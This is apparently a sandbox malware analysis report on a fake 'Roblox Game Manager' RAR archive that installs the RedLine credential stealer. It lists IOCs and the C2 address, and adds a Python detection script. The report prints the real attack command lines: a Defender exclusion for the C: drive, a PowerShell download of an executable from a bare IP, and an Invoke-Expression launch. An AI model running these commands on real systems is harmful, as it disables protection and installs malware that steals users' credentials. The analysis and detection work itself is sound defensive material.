File name: Roblox Game Manager.rar
Full analysis: https://app.any.run/tasks/f73c1b97-2bdc-4533-a995-10993290c2aa
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: June 25, 2023, 16:10:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
redline
opendir
rat
loader
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5: A7A070FEA3E75A91856AE28BA200EB45
SHA1: 18A93136443481CA0EEDE8EC625E21517B504C1B
SHA256: 914349176C58586166FED229065945D849DE72E34CAE9E04585D6186D08F9D34
SSDEEP: 49152:0njnC2HQk9DL6KuEsJKJDoWC1T1o6o1FfBfpu9y3h7lsgmx4srNNVkWyg6tIksvp:cf9DGK8kbkC6o1lu43BmuwBkWQtIkm

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 3096)
      • cmd.exe (PID: 2044)
    • Application was dropped or rewritten from another process

      • dclppAf.exe (PID: 1628)
      • dclppAf.exe (PID: 752)
    • REDLINE detected by memory dumps

      • vbc.exe (PID: 2476)
      • vbc.exe (PID: 796)
    • Unusual connection from system programs

      • vbc.exe (PID: 2476)
      • vbc.exe (PID: 796)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3604)
    • REDLINE was detected

      • vbc.exe (PID: 796)
    • Steals credentials from Web Browsers

      • vbc.exe (PID: 796)
    • Connects to the CnC server

      • vbc.exe (PID: 796)
    • Actions looks like stealing of personal data

      • vbc.exe (PID: 796)
  • SUSPICIOUS

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 3096)
      • cmd.exe (PID: 2044)
    • Reads the Internet Settings

      • powershell.exe (PID: 3372)
      • Roblox Game Manager.exe (PID: 2460)
      • powershell.exe (PID: 3792)
      • Roblox Game Manager.exe (PID: 2272)
      • powershell.exe (PID: 1472)
      • powershell.exe (PID: 3604)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3792)
    • Executing commands from a ".bat" file

      • Roblox Game Manager.exe (PID: 2460)
      • Roblox Game Manager.exe (PID: 2272)
    • Starts CMD.EXE for commands execution

      • Roblox Game Manager.exe (PID: 2460)
      • Roblox Game Manager.exe (PID: 2272)
    • Download files or web resources using Curl/Wget

      • cmd.exe (PID: 3096)
      • cmd.exe (PID: 2044)
    • Using PowerShell to operate with local accounts

      • powershell.exe (PID: 3372)
      • powershell.exe (PID: 1472)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 3096)
      • cmd.exe (PID: 2044)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3096)
      • cmd.exe (PID: 2044)
    • Connects to unusual port

      • vbc.exe (PID: 2476)
      • vbc.exe (PID: 796)
    • The Powershell connects to the Internet

      • powershell.exe (PID: 3792)
      • powershell.exe (PID: 3604)
    • Unusual connection from system programs

      • powershell.exe (PID: 3792)
      • powershell.exe (PID: 3604)
    • The process executes VB scripts

      • dclppAf.exe (PID: 1628)
      • dclppAf.exe (PID: 752)
    • Process requests binary or script from the Internet

      • powershell.exe (PID: 3604)
    • Connects to the server without a host name

      • powershell.exe (PID: 3604)
    • Searches for installed software

      • vbc.exe (PID: 796)
    • Reads browser cookies

      • vbc.exe (PID: 796)
  • INFO

    • Checks supported languages

      • dclppAf.exe (PID: 1628)
      • Roblox Game Manager.exe (PID: 2460)
      • Roblox Game Manager.exe (PID: 2272)
      • vbc.exe (PID: 2476)
      • wmpnscfg.exe (PID: 3028)
      • dclppAf.exe (PID: 752)
      • vbc.exe (PID: 796)
    • The executable file from the user directory is run by the Powershell process

      • dclppAf.exe (PID: 1628)
      • dclppAf.exe (PID: 752)
    • Create files in a temporary directory

      • Roblox Game Manager.exe (PID: 2460)
      • Roblox Game Manager.exe (PID: 2272)
    • Reads the computer name

      • dclppAf.exe (PID: 1628)
      • Roblox Game Manager.exe (PID: 2460)
      • wmpnscfg.exe (PID: 3028)
      • vbc.exe (PID: 2476)
      • Roblox Game Manager.exe (PID: 2272)
      • dclppAf.exe (PID: 752)
      • vbc.exe (PID: 796)
    • The process checks LSA protection

      • Roblox Game Manager.exe (PID: 2460)
      • wmpnscfg.exe (PID: 3028)
      • vbc.exe (PID: 2476)
      • dclppAf.exe (PID: 1628)
      • Roblox Game Manager.exe (PID: 2272)
      • vbc.exe (PID: 796)
      • dclppAf.exe (PID: 752)
    • Reads the machine GUID from the registry

      • vbc.exe (PID: 2476)
      • wmpnscfg.exe (PID: 3028)
      • dclppAf.exe (PID: 1628)
      • dclppAf.exe (PID: 752)
      • vbc.exe (PID: 796)
    • Manual execution by a user

      • wmpnscfg.exe (PID: 3028)
    • Reads Environment values

      • vbc.exe (PID: 796)
    • Reads product name

      • vbc.exe (PID: 796)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

RedLine

(PID) Process: (2476) vbc.exe
C2 (1): 94.142.138.105:15111
Botnet: cryptx
Err_msg:
Auth_value: a45302b7daf4f87798af144567e5d0ff
US (14): net.tcp://, /, localhost, a45302b7daf4f87798af144567e5d0ff, Authorization, ns1, CCE9EzoxNB0LHykcOCZRHAoxOVA6MTAcCiEpWw==, HkYmUxQtN1A=, Gulfweed

(PID) Process: (796) vbc.exe
C2 (1): 94.142.138.105:15111
Botnet: cryptx
Err_msg:
Auth_value: a45302b7daf4f87798af144567e5d0ff
US (14): net.tcp://, /, localhost, a45302b7daf4f87798af144567e5d0ff, Authorization, ns1, CCE9EzoxNB0LHykcOCZRHAoxOVA6MTAcCiEpWw==, HkYmUxQtN1A=, Gulfweed

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
All screenshots are available in the full report
Total processes: 64
Monitored processes: 18
Malicious processes: 12
Suspicious processes: 1

Behavior graph

Process chain as shown in the graph ("no specs" marks a node with no signature hits); the same chain ran twice:

start → winrar.exe (no specs) → roblox game manager.exe (no specs) → roblox game manager.exe → cmd.exe (no specs) → powershell.exe (no specs), powershell.exe, powershell.exe (no specs) → dclppaf.exe (no specs) → #REDLINE vbc.exe
wmpnscfg.exe (no specs)
roblox game manager.exe (no specs) → roblox game manager.exe → cmd.exe (no specs) → powershell.exe (no specs), powershell.exe, powershell.exe (no specs) → dclppaf.exe (no specs) → #REDLINE vbc.exe

Process information

Each entry gives PID, command line, path and parent process, followed by the process details and its loaded modules.
PID: 3460
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\Roblox Game Manager.rar"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\windows\system32\ntdll.dll
c:\program files\winrar\winrar.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\lpk.dll
c:\windows\system32\shlwapi.dll
PID: 3868
CMD: "C:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Roblox Game Manager.exe"
Path: C:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Roblox Game Manager.exe
Parent process: WinRAR.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540 (0xC000042C, STATUS_ELEVATION_REQUIRED: this medium-integrity instance exited at once, and the same binary then runs as PID 2460 at HIGH integrity, consistent with a UAC re-launch requested by its manifest)
Modules
Images
c:\users\admin\appdata\local\temp\rar$exb3460.47446\roblox game manager\roblox game manager.exe
c:\windows\system32\ntdll.dll
PID: 2460
CMD: "C:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Roblox Game Manager.exe"
Path: C:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Roblox Game Manager.exe
Parent process: WinRAR.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\rar$exb3460.47446\roblox game manager\roblox game manager.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
PID: 3096
CMD: "C:\Windows\system32\cmd.exe" /c "C:\Users\admin\AppData\Local\Temp\ED.tmp\FE.tmp\FF.bat "C:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Roblox Game Manager.exe""
Path: C:\Windows\System32\cmd.exe
Parent process: Roblox Game Manager.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 3372
CMD: powershell -Command "Add-MpPreference -ExclusionPath "'C:\'"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1 (non-zero: the exclusion of the whole C: volume was attempted, but on this Windows 7 guest it is not certain the cmdlet succeeded; confirm with Get-MpPreference before treating the exclusion as applied)
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 3792
CMD: powershell -command "wget "http://89.23.96.203/dashboard/1/trashcr.exe" -outfile "C:\Users\admin\AppData\Roaming\dclppAf.exe"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
Note: wget here is the Windows PowerShell alias of Invoke-WebRequest, not GNU wget; the payload is fetched from a bare IP and written under AppData\Roaming.
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 2192
CMD: powershell -command "Invoke-Expression -Command "C:\Users\admin\AppData\Roaming\dclppAf.exe"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 1628
CMD: "C:\Users\admin\AppData\Roaming\dclppAf.exe"
Path: C:\Users\admin\AppData\Roaming\dclppAf.exe
Parent process: powershell.exe
Note: the version resource names an unrelated product (Chasys Draw IES); the loaded module list includes mscoree.dll, so this is a .NET binary.
User:
admin
Company:
John Paul Chacha's Lab
Integrity Level:
HIGH
Description:
Setup Package for Chasys Draw IES
Exit code:
0
Version:
5, 25, 1, 0
Modules
Images
c:\users\admin\appdata\roaming\dclppaf.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shlwapi.dll
PID: 2476
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Parent process: dclppAf.exe
Note: the VB compiler started with no arguments by a binary under AppData\Roaming, and RedLine found only in its memory dumps, is the pattern of a hollowed host process rather than a payload on disk.
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Visual Basic Command Line Compiler
Version:
12.0.51209.34209
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\vbc.exe
c:\windows\system32\mscoree.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
RedLine configuration extracted from this process: see the RedLine section above.
PID: 3028
CMD: "C:\Program Files\Windows Media Player\wmpnscfg.exe"
Path: C:\Program Files\Windows Media Player\wmpnscfg.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ntdll.dll
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ole32.dll
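The command lines above give a detection engineer everything needed to write rules for this chain: a Defender exclusion for a drive root, a download cradle from a bare IP into AppData, Invoke-Expression used as a launcher, and a .NET compiler talking to a non-web port. The following is an added example, not ANY.RUN's code: it runs those rules over constructed process and network events modelled on the report (PIDs and command lines copied from above, plus one hypothetical benign MSBuild build as a control) and correlates the hits into a verdict. The event record shapes, rule names and severities are this example's own assumptions.

```python
# Added example, not ANY.RUN's code: rule-based triage of the chain above
# (cmd.exe -> powershell.exe exclusion/download/IEX -> dclppAf.exe -> vbc.exe -> C2).
# Event records, rule names and severities are this example's own assumptions;
# the sample events are constructed from the command lines and connections listed.
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str             # executable file name
    cmdline: str
    parent_image: str
    parent_path: str = ""  # full path of the parent image, when the sensor has it

@dataclass(frozen=True)
class NetEvent:
    pid: int
    image: str
    dst_ip: str
    dst_port: int

@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    pid: int
    detail: str


_EXCLUSION = re.compile(r"Add-MpPreference\b.*?-ExclusionPath\s+[\"']*(?P<path>[A-Za-z]:\\[^\"']*)", re.I)
_CRADLE = re.compile(r"\b(?:wget|curl|iwr|Invoke-WebRequest|DownloadFile|Start-BitsTransfer)\b", re.I)
_DOTTED_QUAD_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/[^\s\"']*", re.I)
_OUTFILE_USERDIR = re.compile(r"-OutFile\s+[\"']?(?P<path>[^\"']*\\AppData\\[^\"']*\.exe)", re.I)
_IEX_USERDIR = re.compile(r"\b(?:iex|Invoke-Expression)\b.*?(?P<path>[A-Za-z]:\\[^\"']*\\AppData\\[^\"']*\.exe)", re.I)
# Signed .NET/SDK binaries that loaders commonly hollow to host the stealer payload
_HOLLOW_TARGETS = {"vbc.exe", "csc.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe", "installutil.exe"}
_WEB_PORTS = {80, 443}


def check_defender_exclusion(ev: ProcEvent) -> Optional[Finding]:
    """Add-MpPreference -ExclusionPath; a bare drive root disables scanning for the whole volume."""
    m = _EXCLUSION.search(ev.cmdline)
    if not m:
        return None
    broad = len(m.group("path").rstrip("\\")) == 2      # "C:" once the trailing backslash is gone
    return Finding("defender_exclusion", "high" if broad else "medium", ev.pid,
                   f"exclusion for {m.group('path')} spawned by {ev.parent_image}")

def check_download_cradle(ev: ProcEvent) -> Optional[Finding]:
    """Download primitive fetching from a bare IP and/or writing an .exe under AppData."""
    if not _CRADLE.search(ev.cmdline):
        return None
    url, out = _DOTTED_QUAD_URL.search(ev.cmdline), _OUTFILE_USERDIR.search(ev.cmdline)
    if not (url or out):
        return None
    return Finding("download_cradle", "high" if (url and out) else "medium", ev.pid,
                   f"url={url.group(0) if url else '-'} outfile={out.group('path') if out else '-'}")

def check_iex_userdir(ev: ProcEvent) -> Optional[Finding]:
    """Invoke-Expression used as a launcher for an executable in the user profile."""
    m = _IEX_USERDIR.search(ev.cmdline)
    return Finding("iex_userdir_exe", "high", ev.pid, f"executes {m.group('path')}") if m else None

def check_lolbin_parent(ev: ProcEvent) -> Optional[Finding]:
    """A hollow-able system binary started by an executable living under AppData."""
    if ev.image.lower() in _HOLLOW_TARGETS and "\\appdata\\" in ev.parent_path.lower():
        return Finding("lolbin_userdir_parent", "high", ev.pid, f"{ev.image} spawned by {ev.parent_path}")
    return None

def check_lolbin_network(ev: NetEvent) -> Optional[Finding]:
    """A compiler/SDK binary talking to a public host; non-web ports weigh higher."""
    if ev.image.lower() not in _HOLLOW_TARGETS:
        return None
    ip = ipaddress.ip_address(ev.dst_ip)
    if ip.is_private or ip.is_multicast or ip.is_link_local or ip.is_loopback:
        return None
    return Finding("lolbin_network", "high" if ev.dst_port not in _WEB_PORTS else "medium",
                   ev.pid, f"{ev.image} -> {ev.dst_ip}:{ev.dst_port}")

def analyze(procs: List[ProcEvent], nets: List[NetEvent]) -> List[Finding]:
    findings: List[Finding] = []
    for ev in procs:
        for check in (check_defender_exclusion, check_download_cradle, check_iex_userdir, check_lolbin_parent):
            hit = check(ev)
            if hit:
                findings.append(hit)
    for net in nets:
        hit = check_lolbin_network(net)
        if hit:
            findings.append(hit)
    return findings

def chain_verdict(findings: List[Finding]) -> str:
    """Correlate: defence evasion + download + LOLBin beaconing is the loader-to-stealer pattern."""
    rules = {f.rule for f in findings}
    if {"defender_exclusion", "download_cradle", "lolbin_network"} <= rules:
        return "loader_chain"
    return "suspicious" if rules else "clean"


# Constructed sample mirroring the first execution chain in the report, plus one benign control.
SAMPLE_PROCS = [
    ProcEvent(3096, "cmd.exe", r'"C:\Windows\system32\cmd.exe" /c "C:\Users\admin\AppData\Local\Temp\ED.tmp\FE.tmp\FF.bat"', "Roblox Game Manager.exe"),
    ProcEvent(3372, "powershell.exe", "powershell -Command \"Add-MpPreference -ExclusionPath \"'C:\\'\"", "cmd.exe"),
    ProcEvent(3792, "powershell.exe", r'powershell -command "wget "http://89.23.96.203/dashboard/1/trashcr.exe" -outfile "C:\Users\admin\AppData\Roaming\dclppAf.exe"', "cmd.exe"),
    ProcEvent(2192, "powershell.exe", r'powershell -command "Invoke-Expression -Command "C:\Users\admin\AppData\Roaming\dclppAf.exe"', "cmd.exe"),
    ProcEvent(2476, "vbc.exe", r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"', "dclppAf.exe", r"C:\Users\admin\AppData\Roaming\dclppAf.exe"),
    # hypothetical PID and paths: a real build invoking vbc.exe from MSBuild should stay quiet
    ProcEvent(5000, "vbc.exe", r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"obj\Debug\app.rsp"', "MSBuild.exe", r"C:\Program Files (x86)\MSBuild\14.0\Bin\MSBuild.exe"),
]
SAMPLE_NETS = [
    NetEvent(2476, "vbc.exe", "94.142.138.105", 15111),  # RedLine C2 from the report
    NetEvent(4, "System", "192.168.100.255", 137),       # NetBIOS broadcast, benign
]

if __name__ == "__main__":
    hits = analyze(SAMPLE_PROCS, SAMPLE_NETS)
    for f in hits:
        print(f"[{f.severity:6}] {f.rule:22} pid={f.pid} {f.detail}")
    print("verdict:", chain_verdict(hits))
```

Each rule on its own is noisy in a developer estate (builds do run vbc.exe, admins do add exclusions); the point of chain_verdict is that the combination seen here, exclusion plus cradle plus a compiler binary beaconing to a public non-web port, is what separates this loader from legitimate activity. Feed it real process-creation and network-connection telemetry (Sysmon event IDs 1 and 3, or your EDR's equivalent) in place of the constructed sample.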
Total events: 12 450
Read events: 12 370
Write events: 77
Delete events: 3

Modification events

(PID) Process: (3460) WinRAR.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\16D\52C64B7E
Operation: write | Name: LanguageList | Value: en-US

(PID) Process: (3460) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface
Operation: write | Name: ShowPassword | Value: 0

(PID) Process: (3460) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write | Name: 2 | Value: C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip

(PID) Process: (3460) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write | Name: 1 | Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip

(PID) Process: (3460) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write | Name: 0 | Value: C:\Users\admin\Desktop\phacker.zip

(PID) Process: (3460) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write | Name: name | Value: 120

(PID) Process: (3460) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write | Name: size | Value: 80

(PID) Process: (3460) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write | Name: type | Value: 120

(PID) Process: (3460) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write | Name: mtime | Value: 100

(PID) Process: (3460) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write | Name: ProxyBypass | Value: 1
Executable files: 1
Suspicious files: 13
Text files: 1 368
Unknown types: 0

Dropped files

PID 3460, WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Data\ached\axinite\rumpot\duenessCaleche.xml (type: xml)
MD5: FC7762BCACDBEB75821E3C3D2AC28455
SHA256: 742AB78B762E05E053961B85ABFA8618A2895662328D1AE4773B1CB12115FB50

PID 3460, WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Data\ached\axinite\benjoinPartile\aboding.xml (type: xml)
MD5: E62A04307D5E1AADE6D6F3F99CB6E2BD
SHA256: 06B3B01858339D87039781BCE1324981768E0D617993A3F51B5EA33A4D404CB8

PID 3460, WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Data\ached\axinite\ovoidalParers.xml (type: xml)
MD5: 81A92A3DF3826262EE836ADC5B3EDBFE
SHA256: 7AA2B8FFEEE3FCAC748430FAF88C3B8B801E78F67F76050D72162CD0513955BF

PID 3460, WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Data\ached\axinite\inialJomon\limplyMorfond.xml (type: xml)
MD5: EC331637A472239F7D472F13C9E835BD
SHA256: D1FB81152A2909862D1CF6C19E68765E3545096D12E35A47E25BF527A90E9519

PID 3460, WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Data\ached\axinite\benjoinPartile\pimpleJicaraJumpily.xml (type: xml)
MD5: 053447672F350A4196E75503383BE104
SHA256: 9505973060B88E2EF0D6C55132E89C1742187CC6B4B944EC76203137C1C17AB7

PID 3460, WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Data\ached\axinite\rumpot\whapukuCorcass.xml (type: xml)
MD5: C17E95105C670AA997577AA6F1629686
SHA256: 29A966C56060162872A125D4D43391B33C4D1E15BCC8908011FB6F564DFDB461

PID 3460, WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Data\ached\axinite\inialJomon\splurt.xml (type: xml)
MD5: 75638DD2021C3C65F87C92022ED2C8C6
SHA256: 332C06B8C7DB769EC022DF4B0A5F81891AD438DC0F0B6EE859DF2F7ECA927876

PID 3460, WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Data\ached\axinite\bismerAfoot\refines.xml (type: xml)
MD5: 5A856C6B9B0AF741F9B6B4FED44C0EC5
SHA256: 740C54122F1DE664CAC6DCCFBE4DAC8FEFFFCFC07E9C61600AF29A6A0E6BF5AA

PID 3460, WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Data\ached\axinite\pimlicoMustelaAmoraic\whineChilion.xml (type: xml)
MD5: 04B15E3AB7CB249FC168B3D2CACD8C63
SHA256: 1773DD3F946DBEAC1DE5CA444E2CC8DF14EB17181D9F8FE1DE0F494415A309E6

PID 3460, WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Data\ached\axinite\bismerAfoot\viraWebbedBossies.xml (type: xml)
MD5: A0F40B5AC4872A26943F67F1132816FD
SHA256: A4887D317901BBA07453C509546E71B9D2BA466B68CB9EA076123ACB982D26BF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 1
TCP/UDP connections: 9
DNS requests: 0
Threats: 39

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3604 | powershell.exe | GET | 200 | 89.23.96.203:80 | http://89.23.96.203/dashboard/1/trashcr.exe | RU | executable | 271 Kb | suspicious

Connections

The Domain column is empty for every row, consistent with the 0 DNS requests: both hosts are contacted by IP.

PID | Process | IP | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | | | whitelisted
4 | System | 192.168.100.255:138 | | | whitelisted
3792 | powershell.exe | 89.23.96.203:80 | LLC Smart Ape | RU | suspicious
1076 | svchost.exe | 224.0.0.252:5355 | | | unknown
3604 | powershell.exe | 89.23.96.203:80 | LLC Smart Ape | RU | suspicious
2400 | svchost.exe | 239.255.255.250:1900 | | | whitelisted
796 | vbc.exe | 94.142.138.105:15111 | Network Management Ltd | RU | malicious
2476 | vbc.exe | 94.142.138.105:15111 | Network Management Ltd | RU | malicious

DNS requests

No data

Threats

PID and Process are not recorded in this export; each alert fired once per execution chain.

Class | Message
Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host
Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
Misc activity | ET INFO Request for EXE via Powershell
Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
Potentially Bad Traffic | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host
Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
Misc activity | ET INFO Request for EXE via Powershell
Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
Potentially Bad Traffic | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response